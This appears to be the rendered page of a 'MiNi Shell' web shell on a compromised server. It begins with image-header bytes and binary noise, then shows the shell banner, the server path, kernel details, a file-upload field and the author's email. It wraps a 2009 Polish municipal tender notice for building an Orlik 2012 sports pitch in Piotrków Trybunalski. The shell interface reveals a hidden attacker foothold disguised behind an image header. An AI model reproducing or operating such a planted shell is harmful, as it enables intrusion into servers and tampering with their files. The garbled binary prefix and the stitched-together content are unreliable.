JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/86765-N-2009.html

<p class="kh_header"><b>Piotrków Trybunalski: BUDOWA BOISKA W RAMACH PROGRAMU BOISKO W MOJEJ GMINIE - ORLIK 2012-ETAP I</b><br>
<b>Numer ogłoszenia: 86765 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA BOISKA W RAMACH PROGRAMU BOISKO W MOJEJ GMINIE - ORLIK 2012-ETAP I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Budowa boiska w ramach programu Boisko w mojej gminie - ORLIK - 2012
- Etap I zgodnie z CPV 45212220-4.
Etap I obejmuje:
a)	Budowę boisk sportowych:
- 	boiska do piłki nożnej o wymiarach .30x62m - na podbudowie przepuszczalnej 	z nawierzchnią syntetyczną, polietylenową - sztuczna trawa. Włókno - monofil     	o wysokości  min. 6 cm (wypełnienie trawy zgodnie z badaniem laboratorium 	np. Labosport) ciężar włókna min. 11000 Dtex, gęstość trawy min. 97000 	włókien m2 ,
-	boiska wielofunkcyjnego o wymiarach 19,10x32,10m - na podbudowie 	przepuszczalnej z nawierzchnią poliuretanową wodoprzepuszczalną,
	w technologii układania nawierzchni typu EPDM, (nawierzchnia wykonana 2-	warstwowo, na podbudowie elastycznej typu ET. Dolna warstwa z granulatu  	SBR nim. 7mm, górna warstwa z kolorowego granulatu EPDM min.7mm),
b)	Budowę ogrodzenia boisk z bramą i furtką dla każdego boiska oddzielną,
c)	Budowę piłkochwytów ( 2 szt.),
d)	Budowę wewnętrznego ciągu komunikacyjnego (nawierzchnia z kostki betonowej),
e)	Wykonanie instalacji zewnętrznych:
-   wewnętrznej elektrycznej linii zasilającej z układem pomiarowym,
-   instalacji oświetlenia zewnętrznego,
f)   Budowę miejsc parkingowych ( 4 szt.).


L.p.	Elementy robót

1.	
Roboty budowlane

1.1.	Roboty rozbiórkowe
1.2.	Usunięcie i wywóz humusu oraz roboty pomiarowe
1.3.	Trawniki
1.4.	Ogrodzenie terenu i boisk
1.5.	Piłkochwyty
1.6.        Nawierzchnia z kostki betonowej szarej gr. 6 cm oraz nawierzchnia żwirowa
1.7.       Boisko wielofunkcyjne na podbudowie przepuszczalnej
1.8.	Boisko do piłki nożnej na podbudowie przepuszczalnej
1.9.	Wykonanie piaskownicy do skoku w dal
1.10.	Zwężenie istniejącej bieżni - ułożenie obrzeży betonowych
1.11.	Zasypanie studni i wycinka drzew
1.12.	Zjazdy do bram i miejsca parkingowe

2.
	
Wyposażenie
2.1.	Wyposażenie boiska do piłki nożnej
2.2.	Wyposażenie boiska wielofunkcyjnego - koszykówka
2.3.	Wyposażenie boiska wielofunkcyjnego - siatkówka

3.	Instalacje elektryczne i oświetlenie terenu

3.1.	Przyłącze kablowe niskiego napięcia
3.2.	Wewnętrzna linia zasilająca
3.3.	Oświetlenie zewnętrzne

2  KOSZTY DO UWZGLĘDNIENIA:
-	badań i sprawdzeń ( badania oporności izolacji, ochrony przeciwporażeniowej, inwentaryzacja geodezyjna powykonawcza),

3. WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
-	Wszystkie roboty winny być prowadzone zgodnie z Prawem Budowlanym:
-	przez osoby posiadające uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności:
-	Konstrukcyjno - budowlanej w zakresie robót budowlanych
        - Prace elektroinstalacyjne muszą być prowadzone pod nadzorem    
       	kierownika robót posiadającego właściwe uprawnienia budowlane 	i wpis do izby inżynierów budownictwa, uprawnienia D do 1 kV, 	członkowie 	zespołu  uprawnienia E instalacyjne do 1 kV.
-	posiadające aktualne zaświadczenie z  Okręgowej Izby Inżynierów Budownictwa.
-	Zamówienie  należy  wykonać  ściśle  wg projektu technicznego i Specyfikacją  techniczną wykonania i odbioru robót,
-	Wszystkie materiały użyte do budowy muszą posiadać: 
*	Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
*	Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją.
     -   Prace elektryczne kończy złożenie pozytywnych protokołów badań wykonanej 
          instalacji oraz inwentaryzacji geodezyjnej zasilania kablowego 
          potwierdzającego wykonanie zgodne z dokumentacją
      -   Wszystkie instalacje sanitarne należy wycenić wraz z próbami, odbiorami , 	uruchomieniami i dokumentami niezbędnymi do uzyskanie pozwolenia na 	użytkowanie.
       -  Niezbędnym jest przed zgłoszeniem oferty szczegółowe zapoznanie się z 	dokumentacją i warunkami terenowymi realizacji robót.
        -  Prace elektryczne kończy złożenie pozytywnych protokołów badań wykonanej 	instalacji oraz inwentaryzacji geodezyjnej sieci zewnętrznej potwierdzającej 	wykonanie zgodne z dokumentacją..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.
1.	Wykonawca zobowiązany jest do wniesienia wadium do dnia 25.06. 2009 r. do godz. 9:00 w wysokości 30.000 zł. 
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu wpłaconym przelewem na rachunek bankowy BGŻ O Piotrków Tryb. Nr : 05203000451110000000261430 Uwaga: Na poleceniu przelewu należy zamieścić adnotację : Wadium - przetarg nieograniczony na: BUDOWĘ BOISKA W RAMACH PROGRAMU BOISKO W MOJEJ GMINIE - ORLIK 2012-ETAP I
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych ,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. (DZ. U. z 2007r. Nr 42 poz. 275)               o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4.	Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.	Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1.	posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

2.	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia (załącznik nr 5);
W szczególności wykonawca musi spełniać następujące warunki:
a)	wykonać w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej trzy roboty budowlane polegające na budowie boisk sportowych, w tym: co najmniej jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i co najmniej jednego boiska z nawierzchnią poliuretanową wg załącznika nr 4;
b)	wskazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności wg załącznika nr 3.
W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej trzech robót budowlanych polegających na budowie boisk sportowych, w tym: co najmniej jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i co najmniej jednego boiska z nawierzchnią poliuretanową. W celu potwierdzenia, iż prace zostały wykonane należycie należy dołączyć protokoły odbioru końcowego usług lub referencje - wg załącznika nr 4
b)	Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z dokumentami potwierdzającym posiadanie przez te osoby:
- uprawnień do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności:
- konstrukcyjno - budowlanej w zakresie robót budowlanych,
- Prace elektroinstalacyjne muszą być prowadzone pod nadzorem kierownika robót posiadającego właściwe uprawnienia budowlane i wpis do izby inżynierów      budownictwa, uprawnienia D do 1 kV, 	członkowie 	zespołu  uprawnienia E instalacyjne do 1 kV,
- zaświadczenia z  Okręgowej Izby Inżynierów Budownictwa - wg załącznika nr 3.

3.	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
W szczególności wykonawca musi spełniać następujące warunki:
a)	posiadać polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 zł (w przypadku Wykonawców składających ofertę wspólną, dokument musi być złożony przynajmniej przez jednego z nich). 

4.	nie podlegać wykluczeniu z postępowania o udzielenie zamówienia.
W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie  art. 24 ust 1 oraz ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 2;
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

    Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków  jakościowych, których należy dołączyć do oferty:


Dokumenty dotyczące nawierzchni poliuretanowej:
a)	Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub
aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej
nawierzchni np. Labosport, lub dokument równoważny.
b)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
c)	Atest PZH dla oferowanej nawierzchni.
d)	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

Dokumenty dotyczące nawierzchni z trawy syntetycznej:
a)	Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-
Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
b)	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny.
c)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
d)	Atest PZH dla oferowanej nawierzchni.
e)	Autoryzacja producenta  trawy  syntetycznej,   wystawiona   dla  wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

Sposób dokonania oceny spełnienia wymaganych warunków:
- przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń 
lub dokumentów zawartych w ofercie.
Zamawiający, na podstawie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia 
i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
Zamawiający wykluczy z postępowania wykonawców w przypadkach określonych 
w art. 24 ustawy Prawo zamówień publicznych. Ofertę wykonawcy wykluczonego uważa się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez upełnomocnionego przedstawiciela wykonawcy, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków. 
- Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z dokumentami potwierdzającym posiadanie przez te osoby:
- uprawnień do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności:
- konstrukcyjno - budowlanej w zakresie robót budowlanych,
- Prace elektroinstalacyjne muszą być prowadzone pod nadzorem kierownika robót posiadającego właściwe uprawnienia budowlane i wpis do izby inżynierów      budownictwa, uprawnienia D do 1 kV, 	członkowie 	zespołu  uprawnienia E instalacyjne do 1 kV,
- zaświadczenia z  Okręgowej Izby Inżynierów Budownictwa - wg załącznika nr 3.
- Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 2.
- Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej trzech robót budowlanych polegających na budowie boisk sportowych, w tym: co najmniej jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i co najmniej jednego boiska z nawierzchnią poliuretanową. W celu potwierdzenia, iż prace zostały wykonane należycie należy dołączyć protokoły odbioru końcowego usług lub referencje - wg załącznika nr 4.
- Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 zł (w przypadku Wykonawców składających ofertę wspólną, dokument musi być złożony przynajmniej przez jednego z nich). 
- Pełnomocnictwo do reprezentowania wykonawcy - jeśli nie wynika to z zapisów 
w odpisie z rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
- Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego -  załącznik nr 5.
- Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- Dokumenty dotyczące nawierzchni poliuretanowej: 
Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub
aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej
      nawierzchni np. Labosport, lub dokument równoważny. 
      Karta techniczna oferowanej nawierzchni potwierdzona przez jej  producenta.
      Atest PZH dla oferowanej nawierzchni.
       Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla  wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

- Dokumenty dotyczące nawierzchni z trawy syntetycznej: 
Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-
Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny.
Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
Atest PZH dla oferowanej nawierzchni.
Autoryzacja producenta  trawy  syntetycznej,   wystawiona   dla  wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.


Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem i podpisane przez osobę właściwą do reprezentowania wykonawcy.

Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski przez tłumacza przysięgłego, poświadczonym przez wykonawcę. 

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu, zgodnie z zapisami zawartymi w Rozdz. IX SIWZ oraz złożyć dokumenty w sposób opisany w Rozdz. X niniejszej SIWZ.
2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  i przedkładają  do oferty ustanowione pełnomocnictwo. 
3.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.piotrkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
97-300 Piotrków Trybunalski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
97-300 Piotrków Trybunalski 
pok. 317.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com